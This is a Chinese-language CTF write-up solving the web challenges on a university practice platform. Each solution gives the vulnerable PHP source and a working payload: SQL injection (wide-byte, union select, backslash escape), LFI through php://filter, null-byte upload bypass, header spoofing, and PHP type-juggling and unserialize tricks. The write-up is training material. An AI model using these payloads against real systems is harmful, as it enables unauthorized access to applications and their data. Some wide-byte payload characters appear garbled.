最近发现南邮有一个CTF平台,刷了一部分题,WEB题比较全,其他种类的也有覆盖。总结一下WP。
WEB
签到题
题目很简单,查看网页源代码就可以找到flag。
md5 collision
这个题目如果知道MD5碰撞的概念,同时知道了在PHP中的MD5中的0e的比较,这道题目就十分的简单。
如果md的值是以0e开头的,那么就与其他的0e开头的Md5值是相等的。例子如下:
md5('s878926199a')=0e545993274517709034328855841020
md5('s155964671a')=0e342768416822451524974117254469
//可以看到两者的md5值都是以0e开头的,则
md5('s878926199a')==md5('s155964671a') //True
签到2
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
尚未登录或口令错误<form action="./index.php" method="post">
<p>输入框:<input type="password" value="" name="text1" maxlength="10"><br>
请输入口令:zhimakaimen
<input type="submit" value="开门">
</form>
</html>
只要过 maxlength=10 这个限制就可以了。
这题不是WEB
非WEB题,图片隐写。16进制编辑器打开即可。
层层递进
通过查看网页源代码,每次点击第一个frame,最后的网址是 http://chinalover.sinaapp.com/web3/404.html ,查看网页源代码,显示如下:
<!-- Placed at the end of the document so the pages load faster -->
<!--
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->
flag显而易见。(数字的前面)
AAencode
可搜索AAencode。flag可以执行这条JS语句后看到。
单身二十年
这个通过burpsuite抓包发现其中有一个 302 http://chinalover.sinaapp.com/web8/search_key.php ,查看内容就会发现其中存在flag。
你从哪里来
使用burpsuite抓包,修改Request包中的Header字段,加上 Referer:www.google.com 就可以拿到flag了。
php decode
题目就是一段PHP代码。代码如下:
<?php
function CLsI($ZzvSWE) {
$ZzvSWE = gzinflate(base64_decode($ZzvSWE));
for ($i = 0; $i < strlen($ZzvSWE); $i++) {
$ZzvSWE[$i] = chr(ord($ZzvSWE[$i]) - 1);
}
return $ZzvSWE;
}eval(CLsI("+7DnQGFmYVZ+eoGmlg0fd3puUoZ1fkppek1GdVZhQnJSSZq5aUImGNQBAA=="));?>
eval改成echo,运行这段代码就可以拿到flag了。
同时推荐看一下http://www.waitalone.cn/eval-gzinflate-base64_decode-decryption.html
文件包含
关于文件包含,参考乌云知识库文件包含 。题目提示是一个LFI的漏洞。访问连接 http://4.chinalover.sinaapp.com/web7/index.php?file=show.php 这就是一个典型的文件包含的漏洞
遇到了这样的文件包含漏洞,就可以使用 filter 的方式读取php的源代码了。用法如下:
http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
网页返回的就是index.php的源代码的base64编码,解码之后显示如下:
<html>
<title>asdf</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:nctf{edulcni_elif_lacol_si_siht}
?>
</html>
flag就知道了。
单身一百年也没用
这道题目是典型的需要通过Burpsuite进行抓包,抓包发现在 302 http://chinalover.sinaapp.com/web9/index.php 中的Header头中存在flag。这道题目和前面的单身二十年的题目类似,都是使用Burosuite进行抓包。抓包的时候就主要关注请求头,响应头,页面返回内容。
Download~!
访问网页之后,看到的页面如下:
<p><a href="download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=" target="_blank">星星点灯</a></p>
<p><a href="download.php?url=YnV4aWFuZ3poYW5nZGEubXAz" target="_blank">不想长大</a></p>
上面显示的就是下载所对应的网页源代码。后面的url的参数的值就是对应的文件名。这姑且可以算作是一个简单的文件包含了。url是可控的,我们将url的参数替换为download.php的base64编码即可。
此时我们使用 http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw 就可以将download.php下载下来。
<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
$file_size = filesize($url);
header ( "Pragma: public" );
header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
header ( "Cache-Control: private", false );
header ( "Content-Transfer-Encoding: binary" );
header ( "Content-Type:audio/mpeg MP3");
header ( "Content-Length: " . $file_size);
header ( "Content-Disposition: attachment; filename=".$url);
echo(file_get_contents($url));
exit;
}
else {
echo "Access Forbidden!";
}
?>
通过查看download.php的源代码,发现其中还存在一个hereiskey.php文件。使用同样的方式查看hereiskey.php的源代码就可以得到flag了。
COOKIE
通过题目就知道始于cookie有关的。通过Burpsuite抓包,发现在响应包中存在 Set-Cookie: Login=0 。根据这个暗示,只需要将cookie设置为 Login=1 就可以得到flag了。
MYSQL
根据题目提示查看题目下面的robots.txt文件,如下:
别太开心,flag不在这,这个文件的用途你看完了?
在CTF比赛中,这个文件往往存放着提示信息
TIP:sql.php
<?php
if($_GET[id]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$id = intval($_GET[id]);
$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
if ($_GET[id]==1024) {
echo "<p>no! try again</p>";
}
else{
echo($query[content]);
}
}
根据提示需要访问sql.php,同时需要提供参数id。这道题目的关键地方是在于intval()函数,将一个字符串转换为int类型。那么就很简单了。
访问链接:
http://chinalover.sinaapp.com/web11/sql.php?id=1024.1
就可以得到flag了。本题需要注意的就是intval()这个函数。
sql injection3
访问链接 http://115.28.150.176/sqli/index.php?id=2 得到的结果如下:
执行的sql语句:SELECT id,title FROM news WHERE id='2'
id: 2 title: gbk_sql_injection
说明这是一个GBK字符串的注入,关于GBK的字符串注入,可以参考 宽字节注入详解 。
通过使用 %df' 就可以逃脱分号的束缚。使用sql语句 http://115.28.150.176/sqli/index.php?id=�' union select * from news%23 ,页面可以正常地显示内容,接下里就是需要找出flag了。
最后通过各种探查手段,使用sql语句: http://115.28.150.176/sqli/index.php?id=�' union select *,1 from flag%20%23 显示内容如下:
执行的sql语句:SELECT id,title FROM news WHERE id='運' union select *,1 from flag #'
id: nctf{gbk_3sqli} title: 1
/x00
这道题目已经暗示了是一个字符串截断的题目。访问题目地址显示内容如下:
if (isset ($_GET['nctf'])) {
if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
echo '必须输入数字才行';
else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)
die('Flag: '.$flag);
else
echo '骚年,继续努力吧啊~';
}
这个题目在之前的hackit中的练习平台上面也有讲过。可以看这道题目中的第四关。题目几乎一样。在这道题目中,payload就是:
http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1�%23biubiubiu
bypass again
访问题目得到如下代码:
if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) === md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
根据题目的意思,需要传入a和b2个参数,但是要求a和b的值不相等的同时a的md5和b的md5需要相等。这道题目不能使用md5碰撞的方法来解决这个问题,因为在这道题目中使用的是恒等,要求值的类型和值完全相同。
这道题目看似没有办法,但其实是利用了PHP中的一个trick。
当md5一个数组的时候,得到的结果是一个空值。那么2个数组的md5是相等。
那么这道题目的payload为:
http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2
变量覆盖
题目链接
查看网页源代码,关键代码为:
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") { ?>
extract($_POST);
if ($pass == $thepassword_123) {
echo $theflag;
}
?>
extract():从数组中将变量导入到当前的符号表,该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。由于extract的参数直接是$_POST,那么就存在了变量覆盖的可能了。使用Burpsuite修改请求参数,传递pass和thepassword_123覆盖掉默认的thepassword_123的值,就可以得到flag了。
PHP是世界上最好的语言
题目链接
查看网页源代码:
<?php
if(eregi("hackerDJ",$_GET[id])) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
echo "<p>Access granted!</p>";
echo "<p>flag: *****************} </p>";
}
?>
这道题目的问题在于urldecode(),开发者可能认为传递过来的$_GET[id]没有进行url编码,但是实际上已经经过了url的编码。那么这道题目只需要将id=hackerDJ进行两次url编码即可。最终的payload为:
http://way.nuptzj.cn/php/index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a
伪装者
不是本地登陆你还想要flag?
根据提示需要本地登陆,那么就需要修改请求头了。增加请求头 X-Forwarded-For: 127.0.0.1 就可以通过验证拿到flag了。
上传绕过
这道题目当时也是做了很长时间,一直无法绕过。虽然我知道这道题目考察的是截断上传的知识点,但是还是无从下手。
如果上传了一个PHP文件之后,网页返回的结果就是:
Array ( [0] => .php [1] => php ) 不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件首先是要通过png,jpg的验证,然后在需要进行php的验证。
抓包发现参数dir存在一个uploads的值,那么修改参数为uploads/1.php[空格],然后在16进制模式下,将20修改为00。最后就可以得到flag了。
SQL注入1
题目链接
其中的核心代码如下:
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = trim($_POST[user]);
$pass = md5(trim($_POST[pass]));
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
echo '</br>'.$sql;
$query = mysql_fetch_array(mysql_query($sql));
if($query[user]=="admin") {
echo "<p>Logged in! flag:******************** </p>";
}
if($query[user] != "admin") {
echo("<p>You are not admin!</p>");
}
}
echo $query[user];
?>
一个入门级的SQL注入的例子。payload如下:
user=admin%27%29%23&pass=Password
pass check
核心代码如下:
<?php
$pass=@$_POST['pass'];
$pass1=*;//被隐藏起来的密码
if(isset($pass)) {
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
} else {
echo "the pass is wrong!";
}
} else {
echo "please input pass!";
}
?>
这道题目中使用了strcmp()函数来比较pass和pass1的值是否相等。但是strcmp()同样存在漏洞。关于strcmp的漏洞网上有很多,这里截取了网上的一段分析:
strcmp() 函数比较两个字符串。
该函数返回:
0 - 如果两个字符串相等;
<0 -如果= string1="" 小于 string2;
>0 - 如果 string1 大于 string2
这里的strcmp函数实际上是将两个变量转换成ascii 然后做数学减法,返回一个int的差值。
也就是说键入’a’和’a’进行比较得到的结果就是0那么如果让$array和’a’比较,php返回null。
那么这道题目就可以将pass以一个数组的方式传入。
起名字真难
代码如下
<?php
function noother_says_correct($number) {
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++) {
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) ){
return false;
}
}
return $number == '54975581388';
}
$flag='*';
if(noother_says_correct($_GET['key']))
echo $flag;
else
echo 'access denied';
?>
这道题目看似没有办法,但是想到可以传入16进制,那么问题就解决了。所以payload为:
http://chinalover.sinaapp.com/web12/index.php?key=0xccccccccc
php反序列化
代码:
<?php
class just4fun {
var $enter;
var $secret;
}//这里声明了一个类,有enter和secret两个对象
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];//获取pass的值
if(get_magic_quotes_gpc()){
$pass=stripslashes($pass);//去掉转义符
}
$o = unserialize($pass);//反序列化
if ($o) {
$o->secret = "*";
if ($o->secret === $o->enter)//判断严格相等
echo "Congratulation! Here is my secret: ".$o->secret;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
}
?>
关于序列化和反序列化
在代码中最重要的是$o->secret === $o->enter,要达到这个要求,有这样的解释
在 PHP 中普通的传值赋值行为有个例外就是碰到对象 object 时,在 PHP 5 中是以引用赋值的,除非明确使用了 clone 关键字来拷贝,PHP 支持引用赋值,使用“$var = &$othervar;”语法。引用赋值意味着两个变量指向了同一个数据,没有拷贝任何东西。
这句话就是解题的关键。面向对象中引用的用法也是如此。
于是构造
<?php
class just4fun {
var $enter;
var $secret;
}
$o = new just4fun();
$o->enter = &$o->secret;
echo serialize($o);
?>
提交即可。
sql injection 4
题目的提示是:
反斜杠可以用来转义,仔细查看相关函数的用法
查看网页的源代码,
<!--
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';
function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str);
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
echo $flag;
-->
Invalid password!
发现sql查选语句使用了引号,对于此种类型的sql注入就必须要闭合其中的引号。由于使用了htmlentities()函数,所以无法使用号了。此时就可以使用反斜杠来通过转义的方式来吞掉一个分号。注入的payload为:
http://chinalover.sinaapp.com/web15/index.php?username=admin\&password= or 1%23
那么最后的查询语句就会变为:
SELECT * FROM users WHERE name='admin\'AND pass=' or 1#'
这样就得到了flag了。
其中user为admin'AND pass= 同时加上 or 1的判断,显然where条件均为真。
其实本体比较的简单,遇到了带有引号的sql查找,就是要逃脱单引号,要么就是生成一个单引号,要么就是省略掉一个单引号。在本题中由于没有屏蔽反斜线,就可以使用反斜线来去掉一个单引号。
综合题
打开后用JSFUCK解题无果,抓包后发现tip:history of bash
找到http://www.cnblogs.com/h2-database/archive/2012/07/04/2583318.html
访问.bash_history目录,拿到压缩包文件名,下载解压即可。
SQL注入2
查看网页代码:
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = $_POST[user];
$pass = md5($_POST[pass]);
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
echo "<p>Logged in! Key: ntcf{**************} </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
payload
user=0' union select 'c4ca4238a0b923820dcc509a6f75849b' %23&pass=1
综合题2
这道题目还是很具有挑战性的。相比其他更偏向于奇技淫巧的题目,这道题目更偏向于真实环境下的渗透题目。其中不仅涉及到SQL注入还需要具有一定的渗透经验,具备了以上的能力才有可能做对这道题目。
直接给出几个写好的WP
1.http://blog.spoock.com/2016/06/20/nuptzj-web2-writeup/?utm_source=tuicool&utm_medium=referral
2.http://www.tuicool.com/articles/uYVZbmv
同时P牛的 创造tips的秘籍——PHP回调后门http://drops.wooyun.org/tips/7279
注入实战1
不确定是否是网站问题,没有注入出结果。
密码重置2
首先看题目的提示:
1.管理员邮箱观察一下就可以找到
2.linux下一般使用vi编辑器,并且异常退出会留下备份文件
3.弱类型bypass
查看网页源代码,知道用户名是admin@nuptzj.cn,登陆提交的地址是 http://nctf.nuptzj.cn/web14/submit.php ,根据题目给出来的提示,可能会存在备份文件,一般情况下备份文件一般都是myfile.txt~或者是.myfile.txt.swp,经过测试发现存在.submit.php.swp文件,文件内容如下:
........这一行是省略的代码........ /* 如果登录邮箱地址不是管理员则 die() 数据库结构 -- -- 表的结构 `user` -- CREATE TABLE IF NOT EXISTS `user` ( `id` int(11) NOT NULL AUTO_INCREMENT, `username` varchar(255) NOT NULL, `email` varchar(255) NOT NULL, `token` int(255) NOT NULL DEFAULT '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ; -- -- 转存表中的数据 `user` -- INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES (1, '****不可见***', '***不可见***', 0); */ ........这一行是省略的代码........
if(!empty($token)&&!empty($emailAddress)) {
if(strlen($token)!=10)
die('fail');
if($token!='0')
die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){ echo $flag; }
else{ echo "失败了呀"; }
}
其中就是建表语句以及submit.php的语句。从中可以看到,要求token的长度为10且token的值是0,那么token就可以设置为 0000000000 。